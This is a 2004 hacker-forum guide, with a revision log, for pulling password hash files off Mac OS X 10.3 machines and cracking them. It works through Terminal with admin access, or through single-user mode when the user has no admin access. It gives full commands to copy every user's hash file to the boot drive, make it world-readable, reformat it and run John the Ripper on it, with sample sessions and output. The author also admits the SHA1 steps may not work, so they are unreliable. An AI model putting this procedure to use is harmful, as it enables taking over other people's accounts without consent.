Get Cracking 10.3

GetCracking10.3.html
Written by Hackenslacker, 2004.

Disclaimer

This file is intended for informational usage only. It describes how to obtain hash files for specific, and all users, by means of Terminal (with existing admin access), and Single-User Mode (without existing admin access) in Mac OS X 10.3. The information found in this file is not guaranteed to be true and/or accurate. Some of this information was gleaned from macfora.com, but only commands were copied verbatim. I'm not responsible for what you do, or what anyone else does, with this information.

Recovering Lost Passwords

If you already have admin level access to the target machine, this is where you want to start. If you don't have admin level access, you'll need to read the next section.

Open Terminal.
"sudo -s"
Enter your admin password.
"cd /var/db/shadow/hash"
To list the available accounts and their hash files:
"nireport . /users name generateduid"
You can also use "niutil -readprop . /users/<name> generateduid" to get the hash file for a specific account (in case there are dozens of accounts). Just replace <name> with the account name (don't type the <>'s).
Continuing, for each hash file you want:
"cp <file_name> /;chmod 777 /<file_name>"
Where <file_name> is the name of the file. Do not type the <>'s.
There will now be a file in the top directory of the boot drive for each hash file you copied. Each file will contain the unformatted hash string for the user it belongs to.

Example: Target Username is "nopass"

Last login: Mon Dec  6 02:23:50 on ttyp1
Welcome to Darwin!
localhost:~ hacken$ sudo -s
Password:
localhost:~ root# cd /var/db/shadow/hash
localhost:/var/db/shadow/hash root# niutil -readprop . /users/nopass generateduid
DFA70914-476E-11D9-B6BE-000D936D686E
localhost:/var/db/shadow/hash root# cp DFA7*686E /;chmod 777 /DFA7*686E
localhost:/var/db/shadow/hash root#

File name matching, and wildcards: If you have a file with a long name you don't want to type, use wildcard. A asterisk means "a number of characters" and a question mark means "some character." But, you have to be sure that you only specify the file(s) you want. Thus, it's a good idea to use the first few characters, and the last few characters of a file name.

Recovering Your Admin Password

This chapter assumes the Open Firmware security-mode is set to none (or that you know the password). If Open Firmware protection is enabled, you'll need to disable it. My article GettingSUM covers this. If you have any trouble with this, use Google to find more information.

Reboot and hold cmd-s.
If it doesn't give you a black screen with white text, reread the above paragraph.
When the text stops at a '#' character, run the following:
"mount -uaw"
"/user/libexec/register_mach_bootstrap_servers /etc/mach_init.d"
"cd /var/db/netinfo; netinfod -s local"
"SystemStarter"
"cd /var/db/shadow/hash"
"nireport . /users name generateduid"
This will dump out a list of all the users, along with their generateduid. If there are too many to look through, or the one you want scroll off the screen, you can also use "niutil -readprop . /users/<name> generateduid" to get the hash file for a specific account. Just replace <name> with the account name (don't type the <>'s).
Continuing, for each file not ending in .save or .state:
"cp <file_name> /;chmod 777 /<file_name>"
Where <file_name> is the name of the file. Do not type the <>'s.
"exit" or "logout" or "reboot"
Once the machine is finished booting, log in if you need to. The hash file can be found in the top directory of the boot drive. The hash file can be opened with any text editor for the necessary changes. You may need to "Open with..." in the control-click contextual menu.

Crack the Hash File

Once you've managed to get the hash file out of the /hash directory and on to the top level of the hard disk, you need to format it for cracking. The format you use depends on which crackers you have available. If you have a default John the Ripper 1.6, you'll follow the first set of instructions. If you have lcrack, or if you have a patched John (to handle SHA1), you'll follow the second set of instructions.

Set One: NTLM

Open the hash file in a text editor.
Put the insertion bar at the beginning of the line and type a colon.
Tap the right arrow over, counting 32 characters of the hash, and type a colon.
Repeat.
Delete the remaining 40 characters, and put two more colons (for a total of three at the end).
Save the file (you may wish the rename it).
You now have a NTLM hash file ready for cracking.

You can run this hash file through John the Ripper. John will report having loaded two passwords. When John has cracked a password, it will let you know. Once all the passwords have been cracked, john will print a line and exit. Please note, the passwords will be return as all uppercase, and in the order they were cracked. You'll have to put them back in the correct order (they will be identified), and then guess at the capitalization.

Warning

You will not know the capitalization of the letters in the original password. You must try the different capitalizations. I suggest starting with all lowercase, then all uppercase, then alternating capitalization.

Set Two: SHA1

Open the hash file in a text editor.
Put the insertion bar the end of the line (the right side).
Tap the left arrow over fourty characters of the hash.
Delete the beginning 64 characters (keeping the last fourty).
Type a colon (so the line begins with a colon).
Save the file (rename it if you want to).
You now have a SHA1 hash file ready for cracking.

You can now run this hash through John, as long as you have applied the SHA1 patch, or through lcrack, or macKrack, instead.

Why one or the other? Well, NTLM are easy to crack, but don't give you the capitalization. SHA1 are much harder to crack, but gives you the exact password. The choice between the two is upt to you, and limited by your resources. If you need the exact password, you'll want SHA1, but it might help to crack the NTLM first and try with all lower case. Plus, cracking NTLM tells you what characters the password has, and in what order, thus greatly limiting the character space.

top

Example of NTLM

Username: newbie
Password: password

/ root# cd /var/db/shadow/hash
/var/db/shadow/hash root# niutil -readprop . /users/newbie generateduid
6276A972-4777-11D9-AF9A-000D936D686E
/var/db/shadow/hash root# cp 62*6E /;chmod 777 /62*6E
/var/db/shadow/hash root# exit

Edit the file, and save it where it can be cracked.

localhost:~ hacken$ /Applications/john-1.6/run/john /62*6E
Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])
PASSWOR          (:1)
D                (:2)
guesses: 2  time: 0:00:00:00 100% (2)  c/s: 50882  trying: D - A
localhost:/var/db/shadow/hash root#

NTLM passwords are buffered or truncated to 14 characters (depending how long they actually are), then broken into two 7-letter passwords. In this case, the password ("password") is eight characters, so the last one gets separated. After reconstucting the password, we have "PASSWORD". The "(:1)" and "(:2)" mean first and second sections. Notice it is given here in all capitals. This is how passwords are hashed for NTLM. You will have to guess at the capitalization.

Notes

When dealing with awkward file names (i.e. "87386AS-DFG3-284765-SDJHFG"), you can use an * to represent "a number of characters" (i.e. "8*G"), but don't be ambiguous:

localhost:~ hacken$ ls -a
.                               some file
..                              some other file
.DS_Store                       someone's really important file
localhost:~ hacken$ rm some*file
localhost:~ hacken$ ls -a
.               ..              .DS_Store
localhost:~ hacken$ Oops, someone's really important file was deleted.

Cracked 10.3 password will be shown in all uppercase. You will not know the actual capitalization.

top

History

Dec 1, 2004:

Wrote initial draft, and the first copy.

Posted on Mac Underground.

Dec 2, 2004:

Added History. Removed Chapter 1, step 8.

Changed Chapter 2, step 5 to include "reboot".

Added to Chapter 2, step 1.

Reworded the COnclusion slightly.

Added Hint 3.

Shorted Hint 2.

Dec 2, 2004, PM:

Added the note about capitalization in the Conclusion.

Dec 3, 2004:

Added a few more notes about the capitalization.

Dec 4, 2004:

Re-wrote as an HTML file.

Re-wrote Chapter 1, removing instructions pertaining to john.

Re-wrote Chapters 1 and 2, putting the chmod instructions into chapter 3.

Character width has been increased to about 90, because that's about how wide the Appendix A table is.

We are no longer assuming there is a compiled john available, and SUM instructions have been added.

Moved the Hints to the bottom.

Dec 5, 2004:

Included new info about niutil.

Gave an example in chapter 1.

Move the example from Appendix A into Chapter 2.

Removed Appendix A.

Ended up removing the Example anyway, until I can make a good one specific to SUM.

Removed forced line ending, and recommended character width. The table widths keep changing, so it don't care about it anymore. I can always force the page width in the first <td> tag.

Removed a lot of <pre> tags, to let the browers handle line wrapping.

Dec 10, 2004:

Added SHA1 hash instructions in Chapter 4. But, it doesn't seem to work right.

Cleaned up the appendixes.

Cleaned up the history.

Dec 11, 2004:

Since I re-wrote GettingSUM, I changed Chapter 3 appropriately.

I also changed it's subtitle from "OF anti-SUM" which was a place-holder anyway.

Fixed capitalization in subtitles.

Fixed the "Conclusion" section, which is actually the "Examples" section.

Dec 12, 2004:

Changed niutil to nireport in Chapter 1.

Jul 7, 2005:

Updated some sections to reference other articles.

Corrected errors in the Hints section.

Added hilighting to terminal commands.

Jul 12, 2005:

Removed references to fsck, as this is a 10.3 guide.

Clarified step 7 of Chapter 2.

Mar 21, 2006:

Reformatted the page.